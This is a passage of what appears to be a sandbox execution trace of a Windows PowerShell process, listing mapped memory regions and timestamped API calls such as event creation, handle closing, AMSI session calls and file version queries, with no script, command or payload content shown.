"c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1") Region: id = 12764 start_va = 0x1bb30000 end_va = 0x1bb57fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat") Region: id = 12769 start_va = 0x7ffaa9f90000 end_va = 0x7ffaa9f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9f90000" filename = "" Region: id = 12771 start_va = 0x7ffaa9fa0000 end_va = 0x7ffaa9faffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9fa0000" filename = "" Region: id = 12772 start_va = 0x7ffaa9fb0000 end_va = 0x7ffaa9fbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9fb0000" filename = "" Region: id = 12776 start_va = 0x7ffaa9fc0000 end_va = 0x7ffaa9fcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9fc0000" filename = "" Region: id = 12784 start_va = 0x1a470000 end_va = 0x1a475fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.utility.psm1" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1") Region: id = 12785 start_va = 0x1bb30000 end_va = 0x1bb57fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat") Region: id = 12787 start_va = 0x1a470000 end_va = 0x1a47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a470000" filename = "" Region: id = 12792 start_va = 0x1a470000 end_va = 0x1a47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a470000" filename = "" Region: id = 12793 start_va = 0x1bb30000 end_va = 0x1bb3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb30000" filename = "" Region: id = 12794 start_va = 0x1bb40000 end_va = 0x1bb4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb40000" filename = "" Region: id = 12795 start_va = 0x1bb50000 end_va = 0x1bb5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb50000" filename = "" Region: id = 12796 start_va = 0x1bb60000 end_va = 0x1bb6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb60000" filename = "" Region: id = 12799 start_va = 0x1a470000 end_va = 0x1a47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a470000" filename = "" Region: id = 12803 start_va = 0x1a470000 end_va = 0x1a47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a470000" filename = "" Region: id = 12804 start_va = 0x1bb30000 end_va = 0x1bb3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb30000" filename = "" Region: id = 12805 start_va = 0x1bb40000 end_va = 0x1bb4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb40000" filename = "" Region: id = 12806 start_va = 0x1bb50000 end_va = 0x1bb5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb50000" filename = "" Region: id = 12807 start_va = 0x1a470000 end_va = 0x1a47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a470000" filename = "" Region: id = 12812 start_va = 0x1a470000 end_va = 0x1a47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a470000" filename = "" Region: id = 12813 start_va = 0x1bb30000 end_va = 0x1bb3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb30000" filename = "" Region: id = 12814 start_va = 0x1a470000 end_va = 0x1a47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a470000" filename = "" Region: id = 12815 start_va = 0x1a470000 end_va = 0x1a47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a470000" filename = "" Region: id = 12816 start_va = 0x1bb30000 end_va = 0x1bb3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb30000" filename = "" Region: id = 12817 start_va = 0x1bb40000 end_va = 0x1bb4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb40000" filename = "" Region: id = 12818 start_va = 0x1bb50000 end_va = 0x1bb5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb50000" filename = "" Region: id = 12820 start_va = 0x1a470000 end_va = 0x1a47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a470000" filename = "" Region: id = 12824 start_va = 0x1a470000 end_va = 0x1a47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a470000" filename = "" Region: id = 12825 start_va = 0x1bb30000 end_va = 0x1bb3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb30000" filename = "" Region: id = 12826 start_va = 0x1bb40000 end_va = 0x1bb4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb40000" filename = "" Region: id = 12829 start_va = 0x1bb50000 end_va = 0x1bb5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb50000" filename = "" Region: id = 12830 start_va = 0x1bb60000 end_va = 0x1bb6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb60000" filename = "" Region: id = 12831 start_va = 0x1a470000 end_va = 0x1a47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a470000" filename = "" Region: id = 12832 start_va = 0x1bb30000 end_va = 0x1bb3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb30000" filename = "" Region: id = 12833 start_va = 0x1a470000 end_va = 0x1a47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a470000" filename = "" Region: id = 12837 start_va = 0x1bb30000 end_va = 0x1bb3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb30000" filename = "" Region: id = 12838 start_va = 0x1a470000 end_va = 0x1a47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a470000" filename = "" Region: id = 12839 start_va = 0x1a470000 end_va = 0x1a47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a470000" filename = "" Region: id = 12840 start_va = 0x1bb30000 end_va = 0x1bb3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb30000" filename = "" Region: id = 12841 start_va = 0x1bb40000 end_va = 0x1bb4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb40000" filename = "" Region: id = 12842 start_va = 0x1bb50000 end_va = 0x1bb5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb50000" filename = "" Region: id = 12850 start_va = 0x7ffaa9fd0000 end_va = 0x7ffaa9fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9fd0000" filename = "" Region: id = 12854 start_va = 0x1a470000 end_va = 0x1a47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a470000" filename = "" Region: id = 12855 start_va = 0x1a470000 end_va = 0x1a47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a470000" filename = "" Region: id = 13067 start_va = 0x1bb30000 end_va = 0x1bb6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb30000" filename = "" Region: id = 13072 start_va = 0x1a470000 end_va = 0x1a47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a470000" filename = "" Region: id = 13077 start_va = 0x7ffb24fe0000 end_va = 0x7ffb25078fff monitored = 0 entry_point = 0x7ffb2500f4e0 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 13078 start_va = 0x1bc30000 end_va = 0x1bd0ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 253 os_tid = 0x10b4 [0278.052] AmsiCloseSession () returned 0x7ffb1cb78068 [0278.052] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x694 [0278.052] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x6c4 [0278.052] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x6e4 [0278.052] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x6ec [0278.052] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x6e0 [0278.053] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x6ac [0278.053] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x6f0 [0278.053] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x6d8 [0278.053] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x6f4 [0278.053] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x698 [0278.053] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x6f8 [0278.053] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x69c [0278.053] SetEvent (hEvent=0x6ec) returned 1 [0278.053] SetEvent (hEvent=0x694) returned 1 [0278.053] SetEvent (hEvent=0x6c4) returned 1 [0278.053] SetEvent (hEvent=0x6e4) returned 1 [0278.053] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x688 [0278.054] SetEvent (hEvent=0x574) returned 1 [0278.380] SetEvent (hEvent=0x6e0) returned 1 [0278.380] SetEvent (hEvent=0x6ac) returned 1 [0278.381] SetEvent (hEvent=0x6f0) returned 1 [0278.422] CoCreateGuid (in: pguid=0xccbf8 | out: pguid=0xccbf8*(Data1=0xed3c4aa2, Data2=0x6a4e, Data3=0x4e84, Data4=([0]=0xb6, [1]=0x4e, [2]=0x8d, [3]=0xfa, [4]=0xa, [5]=0x15, [6]=0x47, [7]=0x5d))) returned 0x0 [0278.425] ReportEventW (hEventLog=0x1a690008, wType=0x4, wCategory=0x4, dwEventID=0x193, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x265de28*="Stopped", lpRawData=0x265dc90) returned 1 [0278.428] AmsiCloseSession () returned 0x7ffb1cb78068 [0278.429] AmsiUninitialize () returned 0x1 [0278.468] SetEvent (hEvent=0x574) returned 1 [0278.620] CloseHandle (hObject=0x574) returned 1 [0278.677] SetConsoleCtrlHandler (HandlerRoutine=0x0, Add=0) returned 1 [0278.680] CoGetContextToken (in: pToken=0xcf960 | out: pToken=0xcf960) returned 0x0 [0278.681] CObjectContext::QueryInterface () returned 0x0 [0278.681] CObjectContext::GetCurrentThreadType () returned 0x0 [0278.681] Release () returned 0x0 [0278.681] CoGetContextToken (in: pToken=0xcf470 | out: pToken=0xcf470) returned 0x0 [0278.681] CObjectContext::QueryInterface () returned 0x0 [0278.681] CObjectContext::GetCurrentThreadType () returned 0x0 [0278.681] Release () returned 0x0 [0278.687] CoGetContextToken (in: pToken=0xcf470 | out: pToken=0xcf470) returned 0x0 [0278.687] CObjectContext::QueryInterface () returned 0x0 [0278.687] CObjectContext::GetCurrentThreadType () returned 0x0 [0278.687] Release () returned 0x0 [0278.716] CoGetContextToken (in: pToken=0xcf470 | out: pToken=0xcf470) returned 0x0 [0278.716] CObjectContext::QueryInterface () returned 0x0 [0278.716] CObjectContext::GetCurrentThreadType () returned 0x0 [0278.716] Release () returned 0x0 [0278.718] CoGetContextToken (in: pToken=0xcf480 | out: pToken=0xcf480) returned 0x0 [0278.718] CObjectContext::QueryInterface () returned 0x0 [0278.718] CObjectContext::GetCurrentThreadType () returned 0x0 [0278.718] Release () returned 0x0 [0278.718] CoUninitialize () Thread: id = 259 os_tid = 0x110c Thread: id = 260 os_tid = 0x1110 Thread: id = 261 os_tid = 0x1114 [0265.324] CoGetContextToken (in: pToken=0x1f3fac0 | out: pToken=0x1f3fac0) returned 0x0 [0265.324] CoGetContextToken (in: pToken=0x1f3f9c0 | out: pToken=0x1f3f9c0) returned 0x0 [0265.324] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::Release () returned 0x1 [0265.324] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::Release () returned 0x0 [0265.324] RegCloseKey (hKey=0x564) returned 0x0 [0268.648] CloseHandle (hObject=0x69c) returned 1 [0268.648] CloseHandle (hObject=0x688) returned 1 [0268.649] CloseHandle (hObject=0x6ac) returned 1 [0268.649] CloseHandle (hObject=0x698) returned 1 [0268.649] CloseHandle (hObject=0x564) returned 1 [0268.649] CloseHandle (hObject=0x694) returned 1 [0268.649] CloseHandle (hObject=0x6a4) returned 1 [0268.649] CloseHandle (hObject=0x67c) returned 1 [0268.650] CloseHandle (hObject=0x690) returned 1 [0268.650] CloseHandle (hObject=0x6b0) returned 1 [0268.650] CloseHandle (hObject=0x68c) returned 1 [0268.650] CloseHandle (hObject=0x6a0) returned 1 [0269.960] CertFreeCertificateContext (pCertContext=0x1aa06360) returned 1 [0269.960] CertFreeCertificateContext (pCertContext=0x1a94d160) returned 1 [0272.580] CertFreeCertificateContext (pCertContext=0x1aa06860) returned 1 [0272.581] CloseHandle (hObject=0x694) returned 1 [0278.682] EtwEventUnregister () returned 0x0 [0278.682] EtwEventUnregister () returned 0x0 [0278.682] EtwEventUnregister () returned 0x0 [0278.682] EtwEventUnregister () returned 0x0 [0278.682] EtwEventUnregister () returned 0x0 [0278.685] LocalFree (hMem=0x1a97bc80) returned 0x0 [0278.685] LocalFree (hMem=0x1a97a960) returned 0x0 [0278.689] EtwEventUnregister () returned 0x0 [0278.692] CloseHandle (hObject=0x2f0) returned 1 [0278.699] EtwEventUnregister () returned 0x0 [0278.702] CloseHandle (hObject=0x578) returned 1 [0278.703] CloseHandle (hObject=0x57c) returned 1 [0278.703] CloseHandle (hObject=0x594) returned 1 [0278.703] CloseHandle (hObject=0x568) returned 1 [0278.703] CloseHandle (hObject=0x570) returned 1 [0278.704] CloseHandle (hObject=0x58c) returned 1 [0278.704] CloseHandle (hObject=0x590) returned 1 [0278.704] CloseHandle (hObject=0x56c) returned 1 [0278.704] CloseHandle (hObject=0x560) returned 1 [0278.705] CloseHandle (hObject=0x55c) returned 1 [0278.705] CloseHandle (hObject=0x37c) returned 1 [0278.705] CloseHandle (hObject=0x6f4) returned 1 [0278.706] CloseHandle (hObject=0x6d8) returned 1 [0278.706] CloseHandle (hObject=0x6f0) returned 1 [0278.706] CloseHandle (hObject=0x6bc) returned 1 [0278.706] CloseHandle (hObject=0x6ac) returned 1 [0278.707] UnmapViewOfFile (lpBaseAddress=0x1a420000) returned 1 [0278.708] CloseHandle (hObject=0x3a8) returned 1 [0278.708] CloseHandle (hObject=0x6b8) returned 1 [0278.709] CloseHandle (hObject=0x6b4) returned 1 [0278.709] CloseHandle (hObject=0x684) returned 1 [0278.709] CloseHandle (hObject=0x6e0) returned 1 [0278.709] CloseHandle (hObject=0x6ec) returned 1 [0278.710] CloseHandle (hObject=0x6e4) returned 1 [0278.710] DeregisterEventSource (hEventLog=0x1a690008) returned 1 [0278.711] CloseHandle (hObject=0x6c4) returned 1 [0278.712] CloseHandle (hObject=0x694) returned 1 [0278.713] CloseHandle (hObject=0x688) returned 1 [0278.713] CloseHandle (hObject=0x69c) returned 1 [0278.713] CloseHandle (hObject=0x274) returned 1 [0278.714] CloseHandle (hObject=0x6f8) returned 1 [0278.714] CloseHandle (hObject=0x698) returned 1 [0278.714] CloseHandle (hObject=0x6c0) returned 1 [0278.714] RegCloseKey (hKey=0xffffffff80000004) returned 0x0 [0278.715] CloseHandle (hObject=0x26c) returned 1 [0278.715] CloseHandle (hObject=0x584) returned 1 [0278.716] CloseHandle (hObject=0x598) returned 1 [0278.717] CoGetContextToken (in: pToken=0x1f3f470 | out: pToken=0x1f3f470) returned 0x0 [0278.717] CoGetContextToken (in: pToken=0x1f3f370 | out: pToken=0x1f3f370) returned 0x0 [0278.717] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::Release () returned 0x2 [0278.717] Release () returned 0x1 Thread: id = 262 os_tid = 0x780 [0278.712] CoGetContextToken (in: pToken=0x1a50f860 | out: pToken=0x1a50f860) returned 0x0 [0278.712] CObjectContext::QueryInterface () returned 0x0 [0278.712] CObjectContext::GetCurrentThreadType () returned 0x0 [0278.712] Release () returned 0x0 Thread: id = 263 os_tid = 0xfc8 Thread: id = 265 os_tid = 0x508 Thread: id = 266 os_tid = 0xbb0 Thread: id = 267 os_tid = 0x894 [0262.988] SetThreadUILanguage (LangId=0x0) returned 0x409 [0263.360] CoCreateGuid (in: pguid=0x1b81f0f8 | out: pguid=0x1b81f0f8*(Data1=0x815c68b5, Data2=0xd6a3, Data3=0x4c6e, Data4=([0]=0xb7, [1]=0x18, [2]=0xc8, [3]=0x62, [4]=0x9, [5]=0xc7, [6]=0xe0, [7]=0x4a))) returned 0x0 [0263.367] GetCurrentProcessId () returned 0x10b0 [0263.367] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x10b0) returned 0x5e0 [0263.367] EnumProcessModules (in: hProcess=0x5e0, lphModule=0x2223748, cb=0x200, lpcbNeeded=0x1b81eed8 | out: lphModule=0x2223748, lpcbNeeded=0x1b81eed8) returned 1 [0263.368] GetModuleInformation (in: hProcess=0x5e0, hModule=0x7ff6edf60000, lpmodinfo=0x22239b8, cb=0x18 | out: lpmodinfo=0x22239b8*(lpBaseOfDll=0x7ff6edf60000, SizeOfImage=0x78000, EntryPoint=0x7ff6edf631a0)) returned 1 [0263.369] CoTaskMemAlloc (cb=0x804) returned 0x1a635e00 [0263.369] GetModuleBaseNameW (in: hProcess=0x5e0, hModule=0x7ff6edf60000, lpBaseName=0x1a635e00, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe [0263.369] CoTaskMemFree (pv=0x1a635e00) [0263.369] CoTaskMemAlloc (cb=0x804) returned 0x1a6355f0 [0263.369] GetModuleFileNameExW (in: hProcess=0x5e0, hModule=0x7ff6edf60000, lpFilename=0x1a6355f0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0263.369] CoTaskMemFree (pv=0x1a6355f0) [0263.369] CloseHandle (hObject=0x5e0) returned 1 [0263.369] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x10b0) returned 0x5e0 [0263.369] EnumProcessModules (in: hProcess=0x5e0, lphModule=0x2225c20, cb=0x200, lpcbNeeded=0x1b81eed8 | out: lphModule=0x2225c20, lpcbNeeded=0x1b81eed8) returned 1 [0263.371] GetModuleInformation (in: hProcess=0x5e0, hModule=0x7ff6edf60000, lpmodinfo=0x2225e90, cb=0x18 | out: lpmodinfo=0x2225e90*(lpBaseOfDll=0x7ff6edf60000, SizeOfImage=0x78000, EntryPoint=0x7ff6edf631a0)) returned 1 [0263.371] CoTaskMemAlloc (cb=0x804) returned 0x1a633dc0 [0263.371] GetModuleBaseNameW (in: hProcess=0x5e0, hModule=0x7ff6edf60000, lpBaseName=0x1a633dc0, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe [0263.371] CoTaskMemFree (pv=0x1a633dc0) [0263.371] CoTaskMemAlloc (cb=0x804) returned 0x1a635e00 [0263.371] GetModuleFileNameExW (in: hProcess=0x5e0, hModule=0x7ff6edf60000, lpFilename=0x1a635e00, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0263.371] CoTaskMemFree (pv=0x1a635e00) [0263.371] CloseHandle (hObject=0x5e0) returned 1 [0263.373] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1b81e9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39 [0263.373] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81ede0) returned 1 [0263.373] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x1b81eec0 | out: lpFileInformation=0x1b81eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f2c94e9, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f2c94e9, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f2c94e9, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x74a00)) returned 1 [0263.374] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81eda0) returned 1 [0263.374] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpdwHandle=0x1b81ef98 | out: lpdwHandle=0x1b81ef98) returned 0x73c [0263.374] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwHandle=0x0, dwLen=0x73c, lpData=0x22281d8 | out: lpData=0x22281d8) returned 1 [0263.374] VerQueryValueW (in: pBlock=0x22281d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1b81ef18, puLen=0x1b81ef10 | out: lplpBuffer=0x1b81ef18*=0x2228570, puLen=0x1b81ef10) returned 1 [0263.375] VerQueryValueW (in: pBlock=0x22281d8, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\CompanyName", lplpBuffer=0x1b81eeb8, puLen=0x1b81eeb0 | out: lplpBuffer=0x1b81eeb8*=0x2228290, puLen=0x1b81eeb0) returned 1 [0263.375] VerQueryValueW (in: pBlock=0x22281d8, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\FileDescription", lplpBuffer=0x1b81eeb8, puLen=0x1b81eeb0 | out: lplpBuffer=0x1b81eeb8*=0x22282e4, puLen=0x1b81eeb0) returned 1 [0263.375] VerQueryValueW (in: pBlock=0x22281d8, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\FileVersion", lplpBuffer=0x1b81eeb8, puLen=0x1b81eeb0 | out: lplpBuffer=0x1b81eeb8*=0x222832c, puLen=0x1b81eeb0) returned 1 [0263.375] VerQueryValueW (in: pBlock=0x22281d8, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\InternalName", lplpBuffer=0x1b81eeb8, puLen=0x1b81eeb0 | out: lplpBuffer=0x1b81eeb8*=0x222839c, puLen=0x1b81eeb0) returned 1 [0263.375] VerQueryValueW (in: pBlock=0x22281d8, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\LegalCopyright", lplpBuffer=0x1b81eeb8, puLen=0x1b81eeb0 | out: lplpBuffer=0x1b81eeb8*=0x22283d8, puLen=0x1b81eeb0) returned 1 [0263.375] VerQueryValueW (in: pBlock=0x22281d8, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\OriginalFilename", lplpBuffer=0x1b81eeb8, puLen=0x1b81eeb0 | out: lplpBuffer=0x1b81eeb8*=0x222845c, puLen=0x1b81eeb0) returned 1 [0263.375] VerQueryValueW (in: pBlock=0x22281d8, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\ProductName", lplpBuffer=0x1b81eeb8, puLen=0x1b81eeb0 | out: lplpBuffer=0x1b81eeb8*=0x22284a4, puLen=0x1b81eeb0) returned 1 [0263.375] VerQueryValueW (in: pBlock=0x22281d8, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\ProductVersion", lplpBuffer=0x1b81eeb8, puLen=0x1b81eeb0 | out: lplpBuffer=0x1b81eeb8*=0x2228514, puLen=0x1b81eeb0) returned 1 [0263.375] VerQueryValueW (in: pBlock=0x22281d8, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\Comments", lplpBuffer=0x1b81eeb8, puLen=0x1b81eeb0 | out: lplpBuffer=0x1b81eeb8*=0x0, puLen=0x1b81eeb0) returned 0 [0263.375] VerQueryValueW (in: pBlock=0x22281d8, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\LegalTrademarks", lplpBuffer=0x1b81eeb8, puLen=0x1b81eeb0 | out: lplpBuffer=0x1b81eeb8*=0x0, puLen=0x1b81eeb0) returned 0 [0263.375] VerQueryValueW (in: pBlock=0x22281d8, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\PrivateBuild", lplpBuffer=0x1b81eeb8, puLen=0x1b81eeb0 | out: lplpBuffer=0x1b81eeb8*=0x0, puLen=0x1b81eeb0) returned 0 [0263.375] VerQueryValueW (in: pBlock=0x22281d8, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\SpecialBuild", lplpBuffer=0x1b81eeb8, puLen=0x1b81eeb0 | out: lplpBuffer=0x1b81eeb8*=0x0, puLen=0x1b81eeb0) returned 0 [0263.375] VerQueryValueW (in: pBlock=0x22281d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1b81ee68, puLen=0x1b81ee60 | out: lplpBuffer=0x1b81ee68*=0x2228570, puLen=0x1b81ee60) returned 1 [0263.375] VerLanguageNameW (in: wLang=0x409, szLang=0x1b81eb90, cchLang=0x100 | out: szLang="English (United States)") returned 0x17 [0263.375] VerQueryValueW (in: pBlock=0x22281d8, lpSubBlock="\\", lplpBuffer=0x1b81eeb8, puLen=0x1b81eeb0 | out: lplpBuffer=0x1b81eeb8*=0x2228200, puLen=0x1b81eeb0) returned 1 [0263.486] AmsiInitialize () returned 0x0 [0263.508] AmsiOpenSession () returned 0x0 [0263.508] AmsiScanString () returned 0x80070015 [0263.602] EtwEventRegister () returned 0x0 [0263.602] EtwEventSetInformation () returned 0x0 [0263.609] RoGetParameterizedTypeInstanceIID () returned 0x0 [0263.610] Ro::detail::SimpleMetaDataBuilder::SetParameterizedInterface () returned 0x0 [0263.610] Ro::detail::SimpleMetaDataBuilder::SetParameterizedInterface () returned 0x0 [0263.631] WindowsCreateStringReference () returned 0x0 [0263.631] RoGetActivationFactory () returned 0x0 [0263.671] QueryInterface () returned 0x0 [0263.671] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::QueryInterface () returned 0x80004002 [0263.671] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::QueryInterface () returned 0x80004002 [0263.671] QueryInterface () returned 0x0 [0263.671] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::GetRuntimeClassName () returned 0x8000000e [0263.671] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::Release () returned 0x3 [0263.671] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::AddRef () returned 0x4 [0263.671] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::QueryInterface () returned 0x80004002 [0263.671] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::QueryInterface () returned 0x0 [0263.672] Release () returned 0x4 [0263.672] CoGetContextToken (in: pToken=0x1b81cb80 | out: pToken=0x1b81cb80) returned 0x0 [0263.672] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::QueryInterface () returned 0x80004002 [0263.672] CoGetContextToken (in: pToken=0x1b81cdc0 | out: pToken=0x1b81cdc0) returned 0x0 [0263.672] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::QueryInterface () returned 0x0 [0263.672] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::Release () returned 0x4 [0263.672] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::Release () returned 0x3 [0263.672] WindowsDeleteString () returned 0x0 [0263.672] Release () returned 0x2 [0263.673] CoGetContextToken (in: pToken=0x1b81d7f0 | out: pToken=0x1b81d7f0) returned 0x0 [0263.673] CoGetContextToken (in: pToken=0x1b81d6f0 | out: pToken=0x1b81d6f0) returned 0x0 [0263.673] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::QueryInterface () returned 0x0 [0263.673] AddRef () returned 